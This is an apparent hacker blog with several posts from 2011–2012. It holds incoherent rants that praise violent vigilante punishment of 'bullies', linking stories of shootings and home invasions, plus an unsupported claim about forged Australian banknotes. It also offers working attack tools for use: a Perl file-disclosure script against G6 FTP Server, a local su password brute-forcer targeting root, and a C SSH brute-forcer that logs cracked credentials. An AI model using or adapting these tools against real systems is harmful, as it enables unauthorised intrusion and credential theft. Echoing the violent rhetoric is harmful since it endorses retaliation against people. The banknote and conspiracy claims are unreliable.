Help pay for xds lawyer fees.
LR

[Bully Breakdown]: Well knowledged IT_Sec (father) of daughter,shoots up her laptop, for she was a bully…

Posted on 11th February 2012 in Android, BULLY BREAKDOWN, Codes, Exploits, Papers, Uncategorized

I guess the video will say it all eh ?

 

This was the FATHER of a Bullying,rebellious young FaceBook teenager… she must have had big balls, tryin to get this over her own dad :S

Also, this is an example of the worlds response to Bullys, and the BullyBreakdown project , of wich I am the Author…

You will find MANY more like this, and this hit the news here.. Channel.10/7/9 you know… it aint *small* ,and it aint behind any monitors anymore… just remember that (s)kids ;)

This will only get worse, if these want to be SOPA and DARPA people, get theyre way ….

Anyhow folks, enjoy a GREAT vid!

 

 

XD / worldwide … army of unrepentant nomadz

On Behalf of MMA (Au) and Dana (MMA Usa), and all against the bullys online!

comments: 0 »

BULLY BREAKDOWN! This is the gospel of the ….

Posted on 31st January 2012 in Android, Codes, Exploits, Papers, Uncategorized

Here.. is some help, with how i have watched things, and how i react… i am not in any way affiliated with the people shown below.

BUT, i can say, big brothers are now online, and, will punish the naughy boys and gals.

This will br brutal, and significant, assimilation and annihalation of small groups who try to destroy, people and places, they NEVER know EVER existed…and will still remain, unexistant….

Brothers In Arms ..

Remember what haoppens ONLINE, could also happen OFFLINE…

In times of war…

http://www.fiveaa.com.au/article_man-shot-at-munno-para-west_111377

Shit happens…

^^ For those who annoy … tomuch… sometimes this is the ONLY way…

In the end, it is basically like this for the Bullys ..

http://www.break.com/index/the-best-of-the-worst-parkour-edition-2294595

http://video.couriermail.com.au/2189968224/Horrifying-home-invasion?area=videoindex7

*********************************************************************************************************Poor poor, want to be Bullys, only get ONE thing.

 

http://video.couriermail.com.au/2191276513/Comanchero-home-movie?area=videoindex4

^^RESPECT

 

RECURSIVE FORCE!

Now the power within you, is maybe alittle stronger… dont be afraid of ONLINE and OFFLINE BULLYS ,use Theyre own weapons against them, and may peace be with you all, especially for the youth…

And, for all the rest, I guess you should be LOYAL and follow somethings, you see offline, online…

Remember, treat others how YOU would want to be treated.. or face the wraths of many now empowered people…

JACK THE RIPPER

R.I.P Giove ..

Words of Wisdom , things you MUST know…

Posted on 29th January 2012 in Android, Codes, Exploits, Papers, Uncategorized

My name, I will not give you… but, this is as good as…

I was 11 when i first used commodore64,then became trained by someone even younger than me, to run wares, he was 10, and gave me EVERY compnentry he had, to show nme what i needed…
I am FUGiTiVE.ACU (Australian Crackers United) ,later then formed with ParaDOX/ANGELS,then started a splinter cell group here…. I owned at&t, there was NO laws then, so theyre method was brutality.
Simple, they rang my house at atall times of day, even to speak with me (CiA) and usa feds, and, eventually, the got to my father…. this is when, i was forced, with Police in to, to sell the pc in FRONT of theyre eyes, and never come back, ever… this is things, only the very old members, will know, and this happened… look for me on any .AU warez from amiga500, the Firestarters was the first group i was in….

Anyhow, this is NOT about hate…. it is about allowing people to control you.
I was a sleeper cell unit/cluster of friends VERY close and only commune IRL, you people should use the old team codes… believe me.. the law will not hurt you…if your trained.
To some of the people who only can ddos, i understand, but i beg, please ask the elders, to be schooled, dont fight.. for we will loose the most precious FUCKUP in history…
USE theyre weaponry and mistakes, this is the way of the warrior online, for if you attack only with ddos etc, this will not get voiced, but if you school them, they really are bound by laws, thru France,Italy,Brasil/Rio/Barcelona,UK…Is splinter groups i PERSONALLY trained with mouse_ , for this reason….
NOW, we are awake… and my teams, will start to move in on anti warez..

Be strong, as it will look like shit for abit,but as i mentioned, when sleepers movie was made, it was nothing todo with this, we borrowed theyre names,a s they waited, and had vengeful justice,and lived through it, the deaths of 2, still madesure ONE was OK.
This is the MOB mentality you MUST adopt, and it is HARD… but, ask Mouse_ how hard i am, ask others how hard I am, and why i am here..
I am no idiot…mark my words.. be strong, UNITE, for united you stand, alone you fall, learn to code alittle, not much, as they have alredy messed it somuch, that, there is other groups atwork now, picking them to pieces, reverse engineer skill, is not a base of hacking but, it is often the most poweful weapon ya have… stay stong aussies, and unite as i did… this is NOT hate, this is love, for my country, my voice, and, the Net.
XD / FUGiTIVE

Remeber at the end of “SLEEPERS” (Movie) ,who did win ???

nme, and anyone else trying to ring me, dont.. there is reasons, think ;) later buddys….

comments: 2 »

Aussies ,unite , look at your $50 notes… now read on… for you, i lay my life down… xd / Fugitive/ACUParadox/Angels/Paranoimia ,head of au relations with french warez,CORE,PARANOiMIA (USA – Snow / USA ex CORE) may the phorce now be with you…

Posted on 28th January 2012 in Android, Codes, Exploits, Papers, Uncategorized

Australians,
May i beg one minute of your time, and please, I have also tried to get the pictures up, and just cannot for the life of me but however, the details are now and given now..

On the 50$ AUDollar , take a look

there is specifically a bug with the ‘forged’ copies they are on 4 areas..

A. the top numbering.. look for the ones wich start with a 9 , not a 0 ,this is easy as now, as theyre EVERYWHERE
B. look underneath the notes wich have the 9 numbers, and look underneath both photos, there will be missing two important names.. this is the second features
C. look at the signatures on the 9 digit notes, this will be also different…

For the ones wich are bad will have all 4 bugs, the good aud, is not with these.. there are reasons..
9 because the reevrse bank simple, works on population, per capita.. this == our economy…
These notes were made so well, the banks will deny ofcourse… but it is not so easy to hide now you can see what i am seeing, daily..and live with…
You now hold my life in your hands.
May the force be with you, for, this will not be for me..
amen.
XD

[NEWS]: DONT BE SCARED ONLiNE!

Posted on 27th January 2012 in Android, Codes, Exploits, Papers, Uncategorized

TO clarify why etc, is easy now, and, i think all cresws now understand, this was never hate, but only ever love… for the scene, and for freedom!

This is to respect ALL the people who have in some way helped, please be nice to them… some names …
ISG/magikh0e/peanuter/ac1db1tch3z/Mouse_/tropic/nme … may the phorce be with you!
This, is what could have happened online.. i am, trying to silence this post, but, it will only be a reminder of what can happen, when the ‘kids’ get involved, in mans business, or woman, but, you must learn and understand what a prodigy child is..and respect them….

—> this is going, today to be closed, as it will only be up, because, silly ppl got involved in things, they did never know about to begin with.. but, i do respect these people and, i can honestly say, i hate this wp :P coz, im trying to make it already for only admins or regged/admin users who were invited here.. so, it will be done and closed to public but will always, serve a great reminder..for i have passed the torch to the same people, i once abused….
Times change, and specially when ya fuck wit the warez!!

 

Please Login or Register to read the rest of this content.

G6 FtpServer file disclosure vuln script [some perl code to play with] #HAXNET

Posted on 6th January 2012 in Exploits, Uncategorized

G6 Ftp Server file disclosure vulnerability script here, for anyone fuzzing with G6….seems to be very Big userbase with windows forsue..
ENJOY!

######HAXNET
#!/usr/bin/perl
# G6 Ftp Server file disclosure vulnerability script
use Getopt::Std;
use IO::Socket;

getopts('h:l:p:',\%args);
my ($CRLF,$port,$login,$pass,$sock_res,$win_base,$iis_base,@drives);
$CRLF = "\015\012";
@drives = ("c","d","e","f","s","h","x","i","j");    ## added usb thumb/sdcard/miscro-hubs etc support and laptop/ipad
$port = 21;
$login = 'anonymous';     ## change this if want but this is good for Fingerprint on ranges...with me
$pass = 'anonymous';      ## again this should be changed like sometimes its user@localhost.net ,idk
if (defined $args{h}) {
$host = $args{h};
} else {
print "[-] No host specified.\n";
exit;
}
if (defined $args{l}) {
$login = $args{l};
}
if (defined $args{p}) {
$pass = $args{p};
}
$sock = IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>$host,PeerPort=>$port) || die("[-] Socket error: $!");
$sock_res = <$sock>;
print $sock "USER $login" . $CRLF;
$sock_res = <$sock>;
print $sock "PASS $pass" . $CRLF;
$sock_res = <$sock>;
if ($sock_res !~ /230\s/) {
print "[-] Login/pass not accepted..exiting.\n";
close($sock);
exit;
}
print $sock "PWD" . $CRLF;
$sock_res = <$sock>;
if (lc($sock_res) !~ /\/[a-z][:]\//) {
print "[-] Looks like 'show relative path' is enabled..exiting.\n";
close($sock);
exit;
}
print "[+] Attempting to locate system files..";
$win_base = &FindWindows;
$iis_base = &FindIIS;
print "[!] DONE.\n\n";
close($sock);
print "[!] Windows directory: $win_base\n";
print "[!] Hints to IIS path: $iis_base\n";
exit;

sub FindWindows {
my @win_dirs = ("win","windows","winnt","winme","windows.0");  ## added a cpl here wich were missing, could also be updated more..
foreach $drive (@drives) {
foreach $dir (@win_dirs) {
print ".";
print $sock "SIZE
/$drive:/$dir/regedit.exe" . $CRLF;
$sock_res = <$sock>;
if ($sock_res =~ /213\s/) {
return("$drive:\\$dir");}
}
}
return("[x] Not found");
}

sub FindIIS {
my @iis_files = ("Inetpub/wwwroot/_vti_inf.html","Inetpub/Adminscripts/adsutil.vbs","Inetpub/wwwroot/default.asp");
foreach $drive (@drives) {
foreach $file (@iis_files) {
print ".";
print $sock "SIZE /$drive:/$file" . $CRLF;
$sock_res = <$sock>;
if ($sock_res =~ /213\s/) {
$file =~ s/\//\\/g;
return("$drive:\\$file");
}
}
}
return("[x] Not found");
}

Enjoy,
XD@#HAXNET@EF

VPS Hosting at 9.95 a/mo, VERY nice setups! Use AFF Link to get better deals/support!

Posted on 26th November 2011 in Android, Codes, Exploits, Papers, Uncategorized

SIGNUP HERE -> http://www.vr.org/aff.php?aff=551

Just to point out an awesome VPS hosting place, i currently have 2 boxes at, and who have the BEST customer support i have ever found!
The company is HostVirtual , a 11 location company, with datacenters opening now in Asia, wich is super-fast fiber lines.
Folks, this company is going places.. Also hosting warchall.net , and MANY other sites/shells!
They cater for all, have awesome service, and it is CLOUDS, you get what you pay for, they cannot cheat because xen-cloud, limits usage, accordingly…where openvz, does not. This is why, when your looking at your next Openvz box, check howmuch ram and burstable-ram you get..then check even… you will be shocked :>
This companys boxes are all Xeon QuadCore Highend side of town stuff, aweesome highspeed blades,all with extra fine DDoS protection!

Please use the AFFILIATE link http://www.vr.org/aff.php?aff=551 , and then you can use the hand of god to summon xd– on Efnet for support, or simply submit a ticket!

These boxes are worth it.. initial signup is only 4.31!
Existing customers, get 10% off each ‘instance’ wich is about 8bux for making another VPS… very handy :)

http://www.vr.org/aff.php?aff=551

Linux/BSD sshd bruter

Posted on 24th September 2011 in Uncategorized

Now for Michaels,note i made this for root account,it wasnt configured for it.. great bruter code tho!

make a file.sh
Linux/Bsd bruter

#!/bin/bash
# (c) 1999/2000 <lcamtuf@ids.pl>
# ------------------------------
# Requirements:
# - working /bin/su
# - recent PAM implementation (tested with RedHat 5.x)
# - 'usleep' command and bash 1.14.x or 2.0.x
DESTACC='root'    # Account to crack
WORDFILE='words'  # Wordfile with passwords to test
KILLDELAY=03      # Delay (in 1/10 sec) to wait for su (<10)

# End of setup
clear
echo "RedHat - NothingInLogs[tm] BruteForce(R) Password Crack"
echo "-------------------------------------------------------"
echo "  - (c) 1999/2000, Michal Zalewski <lcamtuf@ids.pl> -  "
echo
if [ ! "$1" = "" ]; then
  DESTACC="$1"
fi
KD=$[KILLDELAY*100000]
echo "[+] Configured against user '$DESTACC', wordfile: $WORDFILE"
echo "[+] Kill-delay set to $KD usecs."
id "$DESTACC" &>/dev/null
if [ ! "$?" = "0" ]; then
  echo "[-] User: '$DESTACC' not found."
  echo
  exit 0
fi
SHL="`grep "^$DESTACC:" /etc/passwd|awk -F: '{print $7}'`"
if [ ! "$SHL" = "/bin/bash" ]; then
  echo "[-] User '$DESTACC' has $SHL set as shell, expect problems."
fi
echo "[+] Destination account is alive and well."
if [ ! -f "$WORDFILE" ]; then
  echo "[-] Wordfile '$WORDFILE' not found, check it."
  echo
  exit 0
fi
if [ ! -u /bin/su ]; then
  echo "[-] Can't find +s on /bin/su, 0wn me."
  echo
  exit 0
fi
if [ ! -x /bin/su ]; then
  echo "[-] Haven't +x on /bin/su, 0wn me."
  echo
  exit 0
fi
echo "[+] /bin/su seems to be executable and setuid, hopefully it works."
if [ ! -x /bin/usleep ]; then
  echo "[-] No /bin/usleep in this system. Be a hacker."
  echo
  exit 0
fi
if [ "$UID" = "0" ]; then
  echo "[-] Root?! your mental right?"
  echo
  exit 0
fi
echo "[+] Let's go straight to number one."
LNS="`cat $WORDFILE | wc -l|awk '{print $1}'`"
CNT=0
echo "[+] Wordfile '$WORDFILE' loaded - $LNS passes."
echo "[+] Estimated time: $[LNS*KILLDELAY/25] secs, max: $[LNS*KILLDELAY/10] secs."
while [ "$CNT" -lt "$LNS" ]; do
  CNT=$[CNT+1]
  PASS="`head -$CNT $WORDFILE|tail -1`"
  echo -ne "[?] Trying: '$PASS' ($CNT/$LNS).                \r"
  echo "$PASS" | su "$DESTACC" &>/dev/null &
  usleep $KD
  kill -9 $! &>/dev/null
  if [ ! "$?" = "0" ]; then
    echo
    echo "[*] Huh, I've tried pass: '$PASS' for: '$DESTACC'."
    echo "[+] Time wasted: $[KILLDELAY*CNT/10] secs."
    echo "[+] Thank You, and hope you enjoyed your stay."
    echo
    exit 0
  fi
done
echo "[*] Hmm, end of wordfile, but no matching passwords :( "
echo "[+] Time wasted: $[KILLDELAY*CNT/10] seconds."
echo "[+] Bad day, try again tomorrow?"
echo
exit 0

And finally for tal0n’s!
A great guy and good friend!

Note, this can use LibSSh v2 if you want to bother to make it ;) i have made that, even for windows, and wont publish that but, it is VERY simple and worth it,you wont get more than routers with these, you really want to be using and compiling with libssh 0.2 or 2.0 whatever it is but not 0.1 as most do…I might, oneday publish the one i have but, it is basically just as i have said, and some people do have it, but just use ssh2 functions to auth instead of 11,and connecting is also abit different but, very easy as it is alot of defines you call in ssh2, rather than functions, like ssh1.
anyhow thats just some rhetoric crap i thought of.. have phun! (xd)

For Linux/BSD

/*
* =====================================================================================================|
* ______________________________________________________________________________________________________
* This WAS private until traders and lame zone-h forum people got ahold of it >:( .                    |
* _____________________________________________________________________________________________________|
*                                                                                                      |
* reflux-sshbrute.c                                                                                    |
*                                                                                                      |
* SSHBrute v1.4 - Tal0n [cyber_talon@hotmail.com] of [Reflux Security] on [09-04-04]                   |
* Based on sshbrute2.c, but much, much better =).                                                      |
*                                                                                                      |
* You MUST have LibSSH installed to compile: http://www.0xbadc0de.be/libssh/libssh-0.1.tgz             |
*                                                                                                      |
* Compiling: gcc -o sshbrute sshbrute.c -lssh                                                          |
* _____________________________________________________________________________________________________|
* Notes for v1.4:                                                                                      |
*                                                                                                      |
* 1) Changed the printing of the banner to a varible instead of text to make updating easier.          |
* 2) Added/Removed some login combonations but still keeping to limit to 50.                           |
* 3) Changed logging names and syntaxs of shells and no shells and no printing of boxes to the screen. |
* 4) Added and changed syntax to view file its bruting and its PID when it starts and finishes.        |
* 5) Added a feature so that it fork()'s into the background while bruting.                            |
*                                                                                                      |
* _____________________________________________________________________________________________________|
* This WAS private until traders and lame zone-h forum people got ahold of it >:( .                    |
* _____________________________________________________________________________________________________|
* =====================================================================================================|
*/
#include <arpa/inet.h>
#include <libssh/libssh.h>
#include <netinet/in.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>

char banner[] = "\nSSHBrute v1.4 - Tal0n [cyber_talon@hotmail.com] of [Reflux Security] on 09-04-04";
int i; // The *process* varible.

int shell(SSH_SESSION *session) // The shell and ssh session.
{
     struct timeval tv; // Some time values.
     BUFFER *readbuf = buffer_new(); // Declare a BUFFER for readbuf and goto buffer_new() function (ref: libssh.h =P).
     int what; // Just a varible we use to do some things.
     time_t start, acum; // Declaring start and acum as time values
     CHANNEL *channel; // Declare "channel" as a channel.
     channel = open_session_channel(session, 1000, 1000); // channel equals open a session channel for session
     if(isatty(0)) // Check if we got a tty.
     what = channel_request_pty(channel); // Request a pty.
     what = channel_request_shell(channel); // Request a shell =)
     start = time(0); // Start the timer =P
while(channel->open != 0) // If the channel's not open, lets...
{
     usleep(500000); // Lets sleeeppppppp
     what = channel_poll(channel, 0); // Channel_poll the channel.
if(what > 0) // If we opened a shell, lets do something with it!
{
     what = channel_read(channel, readbuf, 0, 0); // Read the buffer in the channel.
}
else
{
if(start+5<time(0)) // A ten second timeout.
{
     return -1;
}
}
}
     return 0;
}

void checkauth(char *username, char *password, char *host) // Check authencication.
{
     SSH_OPTIONS *options; // Declare "options" as a SSH_OPTIONS.
     SSH_SESSION *session; // Declare "session" as a SSH_SESSION.
     char *argv[] = {"none"}; // This is weird but needed.
     int argc = 1; // Same as above.
     i++; // Child Process
     alarm(10); // Alarm
     options = ssh_getopt(&argc, argv); // Getopt argc and argv.
     options_set_username(options, username); // Set username.
     options_set_host(options, host); // Set host
     session = ssh_connect(options); // Prepare ssh_connect with the options specified.
if(!session) // If we don't get a session...
     return;
if(ssh_userauth_password(session, NULL, password) != AUTH_SUCCESS) // If the password doesn't work, do this.
{
     ssh_disconnect(session); // Disconnect the ssh session.
     return;
}
if(shell(session)) // If we grab a session...
{
     FILE *fd; // Declare a file descriptor
     fd = fopen("vuln.shell", "a+"); // Open vuln.txt
     fprintf(fd, "[%s/%s %s]\n", username, password, host); // Write into vuln.txt
     fclose(fd); // Close vuln.txt
}
else
{
     FILE *fd; // Declare a file descriptor.
     fd = fopen("vuln.noshell", "a+"); // Open vuln.txt.
     fprintf(fd, "[%s/%s %s]\n", username, password, host); // Write into vuln.txt.
     fclose(fd); // Close vuln.txt.
}
}

int main(int argc, char *argv[]) // Main Function.
{
     char buffer[1000], *s; // Our file buffer and a varible we need to do some things.
     FILE *fd; // Declare a file descriptor.
     int maxfork, numfork; // Login combos and parent process.
if(argc < 2) // If we don't get our arguments...
{
     printf("%s", banner); // Print this.
     printf("\nUsage: %s -brute <hosts.txt> || -grab <ip> || -help\n\n", argv[0]); // Print this.
     return 0;
}
if(strcmp(argv[1], "-brute") == 0) // If the user wants -brute...
{
fd = fopen(argv[2], "r"); // Open argv[1] for reading.
if(fd == NULL) // If its not there...
{
     printf("\nCan't open \"%s\" to read!\n\n", argv[2]); // Print the error.
     return 0;
}
     pid_t pid;
     pid = fork();
     printf("SSHBrute Started (File = %s, PID = %d).\n", argv[2], pid); // Print this.
if(pid < 0)
{
     printf("Error: fork()\n");
     return -1;
}
if(pid == 0)
{
     maxfork = atoi(argv[2]);
while(fgets(buffer, 1000, fd)) // Take in the buffer.
{
     s = strchr(buffer, '\n'); // Look for next lines.
if(s != NULL)
{
     *s = '\0'; // Look for a NULL terminator.
}
if(!(fork())) // If we can fork, start bruting username/password's.
{
     i = 0; // Child Process.
     checkauth("root", "openssh-portable-com", buffer); // Brute user/pass.
     exit(0);
}
else
{
     numfork++; // Parent Process
if(numfork > maxfork) // If the number of forks is greater than max.
{
     for(numfork; numfork > maxfork; numfork--); // Starting *killing* off forks.
}
     wait(NULL); // Wait =P
}
}
printf("\nSSHBrute Complete (File = %s, PID = %d).\n", argv[2], getpid()); // Print this
}
}
if(strcmp(argv[1], "-grab") == 0) // If the user wants -grab...
{
     char buffer[200], data[] = "\r\n\r\n\r\n"; // The data to send.
     int len = strlen(data); // The data's length.
     int sock; // Our unix socket.
     struct sockaddr_in remote; // Declare a sockaddr_in structure (remote).
     remote.sin_family = AF_INET; // Sock family is AF_INET.
     remote.sin_port = htons(22); // Port is 22.
     remote.sin_addr.s_addr = inet_addr(argv[2]); // The ip to connect to.
if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) // If no socket!?
{
     printf("Error: socket()\n"); // Print this.
     return -1;
}
if(connect(sock,(struct sockaddr *)&remote, sizeof(struct sockaddr)) < 0) // If we can't connect!?
{
     printf("Error: connect()\n"); // Print this.
     return -1;
}
     send(sock, data, len, 0); // Send the data.
     memset(buffer, 0, sizeof(buffer)); // Clear the buffer.
     read(sock, buffer, sizeof(buffer)); // Read the buffer.
     printf("\nSSHd Banner: %s\n", buffer); // Print this and the buffer.
     close(sock); // Close our socket.
     return 0;
}
if(strcmp(argv[1], "-help") == 0) // If the user wants -help...
{
     printf("%s", banner); // Print this.
     printf("\n\nSSHBrute is a SSH Daemon login brute forcer (-brute), supports a SSHd banner\n"); // Print this.
     printf("grabber (-grab), and of course this message (-help). Need more info? USE THE SOURCE!\n\n"); // Print this.
     return 0;
}
}
comments: 15 »

Linux SSHd bruter

Posted on 24th September 2011 in Uncategorized

And now for the next one, zorg’s modified:

Linux version:

/*
*brutessh2 is a brute for sshd port wich atempts to login as root trying
*more than 2000 passwords for it.
*users guest , test , nobody and admin with no passwords are included.
*feel free to add more passwords and more users
*this was originally by zorg but, this is modded to attack SSH2,modded list (xd)
*For mass use a synscan :
*Eg: ./biggssh sship.txt
* Ok.Try This : Hostname root:12345
*/

The code is too big to post here.
so I put on pastebin.

http://pastebin.com/S3GciXBf

comments: 1 »